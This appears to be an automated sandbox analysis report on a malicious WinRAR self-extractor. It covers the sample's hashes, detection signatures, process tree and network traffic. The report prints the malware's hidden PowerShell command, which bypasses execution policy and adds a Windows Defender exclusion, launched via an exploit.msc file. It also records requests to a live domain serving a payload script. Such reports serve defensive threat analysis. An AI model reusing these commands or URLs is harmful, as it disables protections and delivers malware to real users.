Edit tour

Windows Analysis Report
IPt9U27NoX.exe

Overview

General Information

Sample name:	IPt9U27NoX.exe renamed because original name is a hash value
Original sample name:	eef6cf314280f0a8bd7724dc8095783596fa6657ac95ee63a01c4b0228f26833.exe
Analysis ID:	1636991
MD5:	7e287e5f835ef3b491383dd8626eead6
SHA1:	3a8a61f315d73a881a591f246fa8c12d594f9d53
SHA256:	eef6cf314280f0a8bd7724dc8095783596fa6657ac95ee63a01c4b0228f26833
Tags:	exeTHEPACKShanghaiCorpuser-JAMESWT_MHT
Infos:

Detection

Score:	63
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sigma detected: MMC Spawning Windows Shell

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious powershell command line found

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected potential crypto function

Enables debug privileges

File is packed with WinRar

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain checking for process token information

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

IPt9U27NoX.exe (PID: 7560 cmdline: "C:\Users\user\Desktop\IPt9U27NoX.exe" MD5: 7E287E5F835EF3B491383DD8626EEAD6)

mmc.exe (PID: 7672 cmdline: "C:\Windows\system32\mmc.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\exploit.msc" MD5: 58C9E5172C3708A6971CA0CBC80FE8B8)

powershell.exe (PID: 7784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP} MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7948 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

svchost.exe (PID: 8048 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Sigma Signatures

System Summary

Sigma detected: MMC Spawning Windows Shell

Source: Process started

Author: Karneades, Swisscom CSIRT: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mmc.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\exploit.msc" , ParentImage: C:\Windows\System32\mmc.exe, ParentProcessId: 7672, ParentProcessName: mmc.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, ProcessId: 7784, ProcessName: powershell.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mmc.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\exploit.msc" , ParentImage: C:\Windows\System32\mmc.exe, ParentProcessId: 7672, ParentProcessName: mmc.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, ProcessId: 7784, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mmc.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\exploit.msc" , ParentImage: C:\Windows\System32\mmc.exe, ParentProcessId: 7672, ParentProcessName: mmc.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, ProcessId: 7784, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mmc.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\exploit.msc" , ParentImage: C:\Windows\System32\mmc.exe, ParentProcessId: 7672, ParentProcessName: mmc.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, ProcessId: 7784, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8048, ProcessName: svchost.exe

Suricata Signatures

ET EXPLOIT [TW] EXPLOIT Possible MMC Remote Command Execution

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T10:48:46.686431+0100	2053706	2	Potentially Bad Traffic	104.21.84.99	443	192.168.2.11	49711	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T10:50:51.631097+0100	1810000	2	Potentially Bad Traffic	192.168.2.11	49722	104.21.84.99	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://eatertoken.com/f7sjdjf2w1/payload/builds/brave.ps1

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: IPt9U27NoX.exe

Virustotal: Detection: 7%

Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 90.7% probability

Source: IPt9U27NoX.exe

Static PE information: certificate valid

Source: unknown

HTTPS traffic detected: 104.21.84.99:443 -> 192.168.2.11:49711 version: TLS 1.2

Source: IPt9U27NoX.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: IPt9U27NoX.exe

Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F6340BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF71F6340BC
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F64B190 SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF71F64B190
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F65FCA0 FindFirstFileExA,	0_2_00007FF71F65FCA0

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49722 -> 104.21.84.99:443
Source: Network traffic	Suricata IDS: 2053706 - Severity 2 - ET EXPLOIT [TW] EXPLOIT Possible MMC Remote Command Execution : 104.21.84.99:443 -> 192.168.2.11:49711

Source: global traffic	HTTP traffic detected: GET /f7sjdjf2w1/brave/ HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: eatertoken.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /f7sjdjf2w1/payload/builds/brave.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: eatertoken.comConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /f7sjdjf2w1/brave/ HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: eatertoken.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /f7sjdjf2w1/payload/builds/brave.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: eatertoken.comConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: eatertoken.com

Source: IPt9U27NoX.exe	String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: IPt9U27NoX.exe	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
Source: mmc.exe, 00000002.00000002.2365168035.00000000055F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: svchost.exe, 00000006.00000002.2364401648.0000028F3A600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: IPt9U27NoX.exe	String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: IPt9U27NoX.exe	String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: IPt9U27NoX.exe	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: IPt9U27NoX.exe	String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.6.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000003.00000002.1225673230.000001DEE19D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: IPt9U27NoX.exe	String found in binary or memory: http://ocsps.ssl.com0
Source: IPt9U27NoX.exe	String found in binary or memory: http://ocsps.ssl.com0?
Source: IPt9U27NoX.exe	String found in binary or memory: http://ocsps.ssl.com0P
Source: powershell.exe, 00000003.00000002.1233072673.000001DEE9CE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://osoft.co
Source: powershell.exe, 00000003.00000002.1201613936.000001DED1B89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1201613936.000001DED1B89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.1201613936.000001DED1961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1201613936.000001DED1B89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000003.00000002.1201613936.000001DED1B89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1232325156.000001DEE9C53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: IPt9U27NoX.exe	String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: IPt9U27NoX.exe	String found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
Source: powershell.exe, 00000003.00000002.1201613936.000001DED1961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.1225673230.000001DEE19D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1225673230.000001DEE19D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1225673230.000001DEE19D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: mmc.exe, 00000002.00000002.2363396353.0000000005164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/
Source: mmc.exe, 00000002.00000002.2363396353.000000000512B000.00000004.00000020.00020000.00000000.sdmp, mmc.exe, 00000002.00000002.2360752670.0000000001201000.00000004.00000020.00020000.00000000.sdmp, exploit.msc.0.dr	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/
Source: mmc.exe, 00000002.00000002.2363396353.00000000051B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/#
Source: mmc.exe, 00000002.00000002.2363396353.000000000512B000.00000004.00000020.00020000.00000000.sdmp, mmc.exe, 00000002.00000002.2360752670.0000000001201000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/)
Source: mmc.exe, 00000002.00000002.2365168035.00000000055E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/...
Source: mmc.exe, 00000002.00000002.2362495969.000000000351B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/.../brave/rave/
Source: mmc.exe, 00000002.00000002.2365168035.00000000055E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/...:
Source: mmc.exe, 00000002.00000002.2365168035.00000000055E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/...R
Source: mmc.exe, 00000002.00000002.2360752670.0000000001201000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/.com/f7sjdjf2w1/brave/
Source: mmc.exe, 00000002.00000002.2365168035.00000000055E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/6
Source: mmc.exe, 00000002.00000002.2363396353.0000000005164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/Dw
Source: mmc.exe, 00000002.00000002.2364335222.0000000005488000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/HuL
Source: mmc.exe, 00000002.00000002.2365168035.00000000055E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/J
Source: mmc.exe, 00000002.00000002.2363396353.000000000512B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/JQ
Source: mmc.exe, 00000002.00000002.2363396353.000000000512B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/LQ
Source: mmc.exe, 00000002.00000002.2365168035.00000000055E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/Q
Source: mmc.exe, 00000002.00000002.2365168035.00000000055E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/T
Source: mmc.exe, 00000002.00000002.2360752670.0000000001201000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/a
Source: mmc.exe, 00000002.00000002.2363396353.00000000051B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/dows
Source: mmc.exe, 00000002.00000002.2360752670.0000000001201000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/f2w1/brave/...
Source: mmc.exe, 00000002.00000002.2363116247.00000000050B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/https://eatertoken.com/f7sjdjf2w1/brave/
Source: mmc.exe, 00000002.00000002.2363396353.0000000005164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/m/
Source: mmc.exe, 00000002.00000002.2363396353.00000000051FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/mC:
Source: mmc.exe, 00000002.00000002.2360752670.0000000001201000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/w
Source: mmc.exe, 00000002.00000002.2365168035.00000000055FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/payload/
Source: mmc.exe, 00000002.00000002.2363116247.00000000050BE000.00000004.00000800.00020000.00000000.sdmp, mmc.exe, 00000002.00000002.2365168035.0000000005614000.00000004.00000020.00020000.00000000.sdmp, mmc.exe, 00000002.00000002.2365168035.00000000055F8000.00000004.00000020.00020000.00000000.sdmp, mmc.exe, 00000002.00000002.2362495969.000000000354D000.00000004.00000020.00020000.00000000.sdmp, brave[1].htm.2.dr	String found in binary or memory: https://eatertoken.com/f7sjdjf2w1/payload/builds/brave.ps1
Source: edb.log.6.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000006.00000003.1204350093.0000028F3A410000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000003.00000002.1201613936.000001DED1B89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1232325156.000001DEE9C91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ion=v4.5mConsumer
Source: mmc.exe, 00000002.00000002.2363396353.0000000005189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: powershell.exe, 00000003.00000002.1225673230.000001DEE19D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: IPt9U27NoX.exe	String found in binary or memory: https://www.ssl.com/repository0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443

Source: unknown

HTTPS traffic detected: 104.21.84.99:443 -> 192.168.2.11:49711 version: TLS 1.2

Source: C:\Windows\System32\mmc.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Source: C:\Users\user\Desktop\IPt9U27NoX.exe

Code function: 0_2_00007FF71F62C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF71F62C2F0

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F641F20	0_2_00007FF71F641F20
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F64CE88	0_2_00007FF71F64CE88
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F625E24	0_2_00007FF71F625E24
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F634928	0_2_00007FF71F634928
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F62F930	0_2_00007FF71F62F930
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F650754	0_2_00007FF71F650754
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F643484	0_2_00007FF71F643484
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F63A4AC	0_2_00007FF71F63A4AC
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F64B190	0_2_00007FF71F64B190
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F662080	0_2_00007FF71F662080
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F63AF18	0_2_00007FF71F63AF18
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F642D58	0_2_00007FF71F642D58
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F648DF4	0_2_00007FF71F648DF4
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F650754	0_2_00007FF71F650754
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F658C1C	0_2_00007FF71F658C1C
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F63BB90	0_2_00007FF71F63BB90
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F635B60	0_2_00007FF71F635B60
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F644B98	0_2_00007FF71F644B98
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F65FA94	0_2_00007FF71F65FA94
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F631A48	0_2_00007FF71F631A48
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F665AF8	0_2_00007FF71F665AF8
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F642AB0	0_2_00007FF71F642AB0
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F621AA4	0_2_00007FF71F621AA4
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F63C96C	0_2_00007FF71F63C96C
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F643964	0_2_00007FF71F643964
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F6589A0	0_2_00007FF71F6589A0
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F65C838	0_2_00007FF71F65C838
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F624840	0_2_00007FF71F624840
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F6276C0	0_2_00007FF71F6276C0
